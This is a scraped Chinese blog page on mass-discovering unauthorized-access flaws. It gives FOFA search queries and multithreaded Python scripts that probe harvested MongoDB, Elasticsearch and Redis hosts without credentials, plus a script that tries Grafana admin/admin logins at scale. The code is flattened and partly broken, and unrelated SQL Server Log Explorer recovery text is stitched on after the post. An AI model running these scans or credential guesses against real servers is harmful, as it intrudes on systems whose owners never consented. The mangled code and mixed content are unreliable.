log explorer for sql 不存在或访问被拒绝_原创干货 | 未授权访问漏洞批量化

本文介绍了如何批量发现并报告互联网上的未授权访问漏洞,包括通过搜索引擎收集URL、使用Python多线程扫描和编写特定服务的未授权脚本。涉及到的服务包括MongoDB、Elasticsearch和Redis。作者分享了部分成果,并提到了其他如Grafana弱口令探测和IP转域名的批量工具。
摘要由CSDN通过智能技术生成

346abc8d4beb293f3db0307d9cbc5c89.gif

未授权访问问题一直存在于互联网,或多或少的管理员不注重服务器的安全,以至于疏忽造成了服务器服务的未授权访问。

有一天,忽然想到,整个互联网的未授权漏洞是不是还有很多,是不是可以给他们提交了,说干就干。针对于三个来源:url获取、批量、未授权脚本

1、url获取:

可以通过搜索引擎收集某个特征的url,比如fofa、shodan、ZoomEye等。这里我用的是fofa,比如查找有mongodb的服务器:country=CN && port=27017 && protocol==mongodb;查找有elasticsearch的服务器:port="9200"&& country=CN && protocol==elastic;查找有redis的服务器:app="redis" && country=CN

2、批量:

这里用到的是python的多线程,下面是一个多线程模板:

import threadingimport timefrom queue import Queueevent = threading.Event()event.set()q = Queue(0)s = time.strftime("%Y‐%m‐%d %H:%M:%S", time.localtime())exitFlag = 0class maint(): def init (self,url,num): self.url = url self.num = num def fff(self): url = self.url # todo print("1") #此处可对探测到有未授权的url进行处理class myThread (threading.Thread): def init (self, q, num): threading.Thread. init (self) self.q = q self.num = num print(num)def run(self): while event.is_set(): if self.q.empty(): break else: sql_spot = maint(self.q.get(),self.num) sql_spot.fff()def scan_thread(q): thread_num = 10 threads = [] for num in range(1,thread_num+1): t = myThread(q,num) threads.append(t) t.start() for t in threads: print(t) t.join()def open_urls(): url_path = r'a.txt' #a.txt为存放url的文本文档 f = open(url_path, 'r',encoding='utf‐8') for each_line in f: q.put(each_line) return qif   name   == ' main ': open_urls() scan_thread(q)

open_urls()函数:

将收集到的url加入队列q中(可以因脚本而异,比如如果是elasticsearch(开放的是9200端口)的话,可以在入队列之前,加上:9200,代码:
each_line = each_line + ":9200")

scan_thread()函数:

传入一个队列q,创线程(1-10),myThread()类实例化得到对象t,将t加入线程队列中,开启线程;join进行线程之间的同步,即主线程任务结束之后,进入阻塞状态,一直 等待其他的子线程执行结束之后,主线再终止。

myThread()类的run()函数:

判断event的状态码,如果为false,则中断;如果为true,继续进行:判断队列是否为空,如果为空,中断,如果不为空,则 创造maint() 类的对象sql_spot,执行sql_spot对象的fff()方法

maint()类的fff()函数:

探测未授权漏洞的主体

3、 未 授 权 脚 本 :

(1)mongodb未授权

查阅资料可以知道,python与mongodb所交互的库为pymongo,所以调用pymongo的连接代码:

client = pymongo.MongoClient("mongodb://" + url, 27017)mydb = client['local']sevenday = mydb['startup_log']doc = sevenday.find()for d in doc:if d:with open("b.txt", "a+") as f: #b为所要保存的txtf.writelines(url + '\n')break else: pass
这里连接mongodb,虽然引用local库里的startup_log表(相当于mysql里的mysql库的user表,只是说存在的形式,不是说内容,可以这么理解,只要startup_log表里能取出来内容,即代码中的(ifd:),那么就说明存在mongodb未授权)

(2)elasticsearch未授权

查阅资料可以知道,如果网页端访问/_cat存在/_cat/master就存在elasticsearch未授权漏洞。这里我进行探测/_plugin/head/(elasticsearch数据库的web管理界面,对于数据的操作很方便),代码如下:
url = url + "/_plugin/head/"try:a = requests.get( url , timeout=3)if a.status_code == 200:with open("elastic.txt","a+") as f:f.writelines(url+'\n')except :pass

只要探测的页面回显是200的,就可以算是未授权漏洞。

(3)redis未授权

查阅资料可以知道,redis与python进行交互的是redis库,调用连接代码:
try:r = redis.Redis(host=url, port=6379, db=0)print(self.url)rs = r.info()if rs:time.sleep(0.1)with open("aaa.txt", "a+") as f:f.write(self.url.replace("\n", "\t") + '\n')else:passexcept:pass
连接上redis以后,读取info信息,如果存在info信息,则说明存在redis未授权访问漏洞

以下是刷出来的成果:

c51060e55365804fbd473dcabcb176ac.png

由于我只挑选了几个进行提交,而且还有一些url并没有获取,还有很大一部分的服务器存在漏洞

ps:

再贴出两个脚本

①grafana(弱口令)3000端口如果开启了grafana(格兰法那)的话,可以进行一次批量探测弱口令:

url = self.urlurl = url.strip()url = url + "/login"data_json = {"user": "admin", "email": "", "password": "admin"}try:b1 = requests.post(url, data_json)with open("success.txt", "a+") as f:if b1.status_code == 200:f.writelines(url+'\n')except :pass

发送一个json数据包给login页面,如果返回200,即为登录成功

②批量探测ip转换域名

可以将探测到的ip,批量转换成域名,对于提交漏洞很有帮助,不需要一个一个的去找域名
res = requests.get("http://site.ip138.com/"+url)res.encoding = 'utf‐8'if "暂无结果" in res.text: passelse: selector = etree.HTML(res.text) target = selector.xpath('//*[@id="list"]/li[3]/a') # target = selector.xpath('//*[@id="list"]/li/a') #查多个url  for ta in target:  a = ta.text  with open("url1"+ s.replace('‐', '') +".txt","a+") as p:  p.writelines(a+ "\n" + "http://"+self.url.strip() +':9200/_plugin/hea d/'+'\n\n')
这里调用的是ip138的查找,读取url,发送请求给ip138,然后根据网页返回的内容进 行提取域名 614ce5d1dc88d2f466db76d40141f989.gif

● 云众可信征稿进行时

● 原创干货 | 记一次拟真环境的模拟渗透测试

● 原创干货 | 从手工去除花指令到Get Key

● 原创干货 | 浅谈被动探测思路

·END·

云众可信

原创·干货·一起玩

6873d94e2bf619f734f62a42fb6708a8.png

微信号:yunzhongkexin好看的人才能点 a407a2c936a9e6b9c0f8234aa17dafdb.gif
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
介绍 Log Explorer主要用于对MSSQLServer的事物分析和数据恢复。你可以浏览日志、导出数据、恢复被修改或者删除的数据(包括执行过update,delete,drop和truncate语句的表格)。一旦由于系统故障或者人为因素导致数据丢失,它能够提供在线快速的数据恢复,最大程度上保证恢复期间的其他事物不间断执行。 他可以支持SQLServer7.0和SQLServer2000,提取标准数据库的日志文件或者备份文件中的信息。 其中提供两个强大的工具:日志分析浏览,对象恢复。具体功能如下: l 日志文件浏览 l 数据库变更审查 l 计划和授权变更审查 l 将日志记录导出到文件或者数据库表 l 实时监控数据库事物 l 计算并统计负荷 l 通过有选择性的取消或者重做事物来恢复数据 l 恢复被截断或者删除表中的数据 l 运行SQL脚本 产品 LogExplore包含两部分 l 客户端软件 l 服务器代理 服务器端代理是保存在SQLServer主机中的一个只读存储过程,他的作用是接受客户端请求,读取在线事物日志块并通过网络传给客户端软件,由客户端软件来读取这些原始的数据块来完成Log Explore所提供的所有功能。 他依赖来的网络协议包括: l Named Pipe:局域网中适用 l Tcp/Ip:广域网中适用 数据库相关介绍 事物日志(Transaction LogSQLServer的每个数据库都包含事物日志,它以文件的形式存储,可以记录数据库的任何变。发生故障时SQLServer就是通过它来保证数据的完整性。 操作(Operation) 操作是数据库中定义的"原子行为",每个操作都在日志文件中保存为一条记录。它可以是用户直接输入的SQL语句,比如标准的insert命令,日志文件中便会记录一条操作代码来标志这个insert操作。 事物(Transaction) 事物是一系列操作组成的序列。他可以理解为直观的不可分割的一笔业务,可以执行成功或者失败。典型的事物比如由应用程序发出的具有开启-提交功能的一组SQL语句。不同的事物靠事物Id号(transaction ID)来区分,具有相同ID的事物记录的日志也相同。 在线事物日志(Online Transaction Log) 在线事物日志是指当前活动数据库所用的日志。可以通过如下命令来确定其对应文件 Select * from SYSFILES 他的文件后缀名一般是.LDF 离线事物日志(Offline Transaction Log) 离线事物日志是指非活动数据库所用的日志。当其数据库处于关闭(ShutDown)才状态下可以进行复制备份操作。他的结果同在线事物日志完全相同。 备份文件 备份文件是保存食物日志备份的文件,通常管理员通过运行SQL语句或者企业管理器来生成该文件。备份文件的内部结构和事物日志不同,他采用称为MTF的格式来保存数据。一个备份文件可以包含一个日志的多组备份,甚至包括多个数据库的混合备份. 设置为自动收缩 企业管理器--服务器--右键数据库--属性--选项--选择"自动收缩" 强烈要求该项不要选中.否则SQLServer将已循环的方式来覆盖先前的日志记录,将会导致LogExplore无法恢复错误. 数据恢复介绍 LogExplore允许你恢复应为误操作或者程序错误而导致的数据丢失或者更改.比如执行update\Delete语句时丢失了where子句,或者错误使用了Dts功能. LogExplore不支持直接修改数据库.他可以生成事物的逆操作脚本. 如果log是delete table where ...的话,生成的文件代码就是insert table .... 你可以通过SQL查询分析器,或者LogExplore的Run SQL Script功能来执行生成脚本. 关于Undo Undo功能可以逆操作一组指定的用户事物。包括insert,delete和update,其局限性如下: l 事物类别:LogExplore只能undo用户事物。用户事物是指在用户表上定义的事物,不支持系统表的更新恢复。同时,他也不支持计划变更的回滚。 l Blob类型:包括text,ntext,image类型。LogExplore只支持这些类型的insert和delete恢复,不支持update语句恢复。 关于redo Redo功能可以再次运行一组指定事物。它可以在以下情况中用到: 丢失数据库而且没有任何备份文件。 l 如果原始日志文件没有丢失可以通过Redo来实现恢复。 l 通过完整备份文件来把数据库恢复到某指定时间点,再通过redo功能完整恢
LogExplorer4.2_SqlServer数据库恢复工具 非常有用的工具,需要的拿去~ 使用Log Explorer查看和恢复数据 使用方法: 打开Log Explorer -> Attach Log File -> 选择SQL Server服务器和登陆方式 -> Connect -> 在Database Name中选择数据库 -> Attach-> 左面对话框中Browse-> View Log-> 就可以看到log记录了 想恢复的话: 右键Log记录 Undo Transation-> 选择保存文件名和路径-> 然后打开该文件到查询分析器里执行 T-sql代码就可以了 例如 如果Log是delete table where ...的话,生成的文件代码就是insert table .... 然后将此insert table的代码放到查询分析器里执行.就可以恢复数据. ---------------------------------------------------------------------- --如何恢复被delete/update的数据 ---------------------------------------------------------------------- 1 连接到被删除数据库的Db 打开log explorer 选择 "file"->"attach log file"->选择服务器和登陆方式->"connect"->选择"数据库"->"attach" 2 查看日志 在左面操作项目的对话框中选择"browse"项目->"view log"->就可以看到当前的Log记录了 3 恢复数据 右键某一条log记录,选择"undo transation"->"选择保存文件名和路径"->然后打开该文件到查询分析器里执行 T-sql代码就可以了 例如: 如果log是delete table where ...的话,生成的文件代码就是insert table .... ---------------------------------------------------------------------- --Log Explorer恢复被drop table和truncate table后的数据 ---------------------------------------------------------------------- 1 连接到被删除数据库的Db 操作同上 2 恢复方法 1) 选择"salvaage dropped/truncate"菜单,在右边的对话框中选择表名,和droped/trucated的日期, File Name中选择生成insert语句脚步的存放位置,condition选择是droped还是truncated, 最后点击"create" 就会生成insert语句,把生成的语句到查询分析器里面执行一下就可以了 2) 选择"ViewDDL Commands"菜单->选"truncate table" 操作项->点击"Salvage"->生成语句->查询分析器里执行 ---------------------------------------------------------------------- --log explorer使用的几个问题 ---------------------------------------------------------------------- 1) 对数据库做完全/差异/日志备份 备份时如果选用了删除事务日志中不活动的条目 再用Log explorer打试图看日志时,提示No log recorders found that match the filter,would you like to view unfiltered data 选择yes 就看不到刚才的记录了 如果不选用了删除事务日志中不活动的条目 再用Log explorer打试图看日志时,就能看到原来的日志并做恢复 2) 修改了其中一个表中的部分数据,此时用Log explorer看日志,可以作日志恢复 3) 然后恢复备份,(注意:恢复是断开log explorer与数据库的连接,或连接到其他数据上, 否则会出现数据库正在使用无法恢复) 恢复完后,再打开log explorer 提示No log recorders found that match the filter,would you like to view unfiltered data,选择yes 就看不到刚才在2中修改的日志记录,所以无法做恢复. 4) 不要用SQL的备份功能备份,搞不好你的日志就破坏了. 正确的备份方法是: 停止SQL服务,复制数据文件及日志文件进行文件备份. 然后启动SQL服务,用log explorer恢复数据
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值